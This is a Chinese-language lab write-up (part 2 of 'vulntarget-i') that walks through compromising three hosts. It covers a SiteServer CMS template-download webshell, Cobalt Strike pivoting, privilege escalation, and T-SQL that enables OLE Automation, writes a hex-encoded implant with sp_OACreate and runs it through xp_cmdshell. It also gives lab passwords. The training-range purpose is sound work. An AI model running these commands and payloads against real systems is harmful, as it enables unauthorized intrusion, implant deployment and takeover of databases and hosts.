vulntarget-i 打靶记录(下)

简介: vulntarget-i 打靶记录

尝试连接3389发现没开,cmd下启动:

run REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f //开启远程桌面

利用抓到的普通用户明文上了远程桌面读取到了后台账号密码:administrator/8B..123admin,尝试内网横向

扫描存活指向第二台135主机,利用CS开了socket代理进内网


No2


2.1getshell-1

端口扫描发现开放8000端口利用前面浏览器抓到的密码成功登进后台,siteserver cms版本6.15翻了一下漏洞尝试利用模板下载漏洞getshell

跑C#程序得到加密后的downloadUrl值然后放入路径:

/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=参数&directoryName=suce

不会显示下载成功,但是文件的确会进行自己解压

尝试访问webshell页面白色成功解析,利用蚁剑成功连接


2.2 getshell-2


木马构造同上

附件上传设置把zip,rar后缀添加白名单使得构造的自解压压缩包能上传上去

shell路径:/SiteFiles/SiteTemplates/压缩包名/shell名.aspx


2.3 getshell-3


上传设置添加aspx后缀白名单,内容管理上传图片会显示重命名后的文件路径

使用蚁剑连接即可


2.4 内网渗透


拿到权限之后命令执行发现不出网主机,准备利用第一台主机做跳板机转发上线

使用第一台上线的靶机做转发上线建立监听地址,注意IP地址选第二张网卡因为内网其他网段不通默认网卡

在做exe木马生成的之后选择分阶木马payload选择新建的转发监听器上传靶机执行上线

尝试提权的时候这里使用梼杌的插件只能连接到公网CS监听器,内网已控主机的监听器是不存在的,这时候可以使用ms16-075的exe启动木马得到system权限但有些麻烦,巨龙拉古插件内置了此功能

选择本地提权功能在弹出的窗口下执行木马即可获取system权限,尝试读取cms数据库配置文件

查看IP发现不在本地上存在双网站库分离环境,尝试开启socket服务利用Proxifier创建代理链

本地连接使用Navicat,MDUT工具mssql数据库

发现sa账号密码字段拿去解密付费后得到明文为QwE123asd,尝试sa用户利用MDUT登陆数据库,可以使用certutil编码转exe文件实现落地,这里尝试sp_oacreate组件落地


3. No3


3.1 文件落地


启用OLE组件:

exec master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE
exec master.dbo.sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

利用python转hex编码脚本把生成的马子转成hex,这里木马的生成和第二台主机一致均为转发上线这里不再阐述

把跑好后的hex编码放在OLE组件内并创建命令执行存储过程 命令:

DECLARE @DATAVARBINARY(MAX)= 0x-hex DECLARE @filepath VARCHAR(MAX)='C:\\Windows\\temp\\cs.exe'DECLARE @ObjectToken INTEXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUTEXEC sp_OASetProperty @ObjectToken,'Type',1EXEC sp_OAMethod @ObjectToken,'Open'EXEC sp_OAMethod @ObjectToken,'Write',NULL, @DATAEXEC sp_OAMethod @ObjectToken,'SaveToFile',NULL, @filepath,2EXEC sp_OAMethod @ObjectToken,'Close'EXEC sp_OADestroy @ObjectToken SELECT @filepath

但当我使用xp_cmdshell执行的时候提示拒绝访问,可能是权限太低了索性写到C:\Users\Public\Downloads\n.exe目录内,在调用cmd执行

成功上线CS命令:

exec master..xp_cmdshell "cmd /c C:\\Users\\Public\\Downloads\\n.exe"

处理提权的操作和第二台一致

成功拿下三台主机

为了贴近实战使用公网CS主机来打测试中代理链不稳可以使用Stowaway来搭多级代理。

相关文章
|
安全 网络安全 PHP
CISP-PTE综合靶机-WinServer2008学习
CISP-PTE综合靶机-WinServer2008学习
1127 0
|
9月前
|
消息中间件 安全 Java
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
本文介绍了多个软件的安全漏洞及其复现过程,涉及的软件包括Vulhub、Flask、ActiveMQ、Adminer、Airflow、Apache Druid、Apereo CAS、APISIX、AppWeb、Aria2、Bash、Cacti、Celery、CGI、ColdFusion和Confluence。每个部分详细描述了漏洞的背景、环境搭建步骤、漏洞复现的具体操作和验证方法。例如,Flask的SSTI漏洞通过构造特定的模板参数实现命令执行;ActiveMQ的反序列化漏洞利用特制的序列化对象触发;这些示例不仅展示了漏洞的危害性,还提供了实际的复现步骤,帮助读者深入理解这些安全问题。
1557 3
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
|
网络协议 JavaScript 前端开发
使用正则表达式验证身份证号、QQ号、手机号、邮箱、地址、邮编、银行卡号、学号、车牌号、快递单号、验证码、ISBN号、网址、IPV4地址、IPV6地址、出生年月日、姓名1
使用正则表达式验证身份证号、QQ号、手机号、邮箱、地址、邮编、银行卡号、学号、车牌号、快递单号、验证码、ISBN号、网址、IPV4地址、IPV6地址、出生年月日、姓名
780 0
|
11月前
|
SQL 数据库
SQL-serve数据库不能连接本地服务器的解决方案
SQL-serve数据库不能连接本地服务器的解决方案
870 0
|
SQL Shell 数据库
MSSQL绕过微软杀毒提权案例
MSSQL绕过微软杀毒提权案例
422 0
|
存储 安全 Linux
|
安全 中间件 关系型数据库
vulntarget-i 打靶记录(上)
vulntarget-i 打靶记录
276 0
|
安全 JavaScript Oracle
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:1
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:1
232 0
|
SQL 安全 Shell
[永久开源] vulntarget-b_打靶记录(上)
[永久开源] vulntarget-b_打靶记录
481 0
|
XML 安全 Oracle
Weblogic IIOP协议反序列化(CVE-2020-2551)漏洞复现
Weblogic IIOP协议反序列化(CVE-2020-2551)漏洞复现
2093 0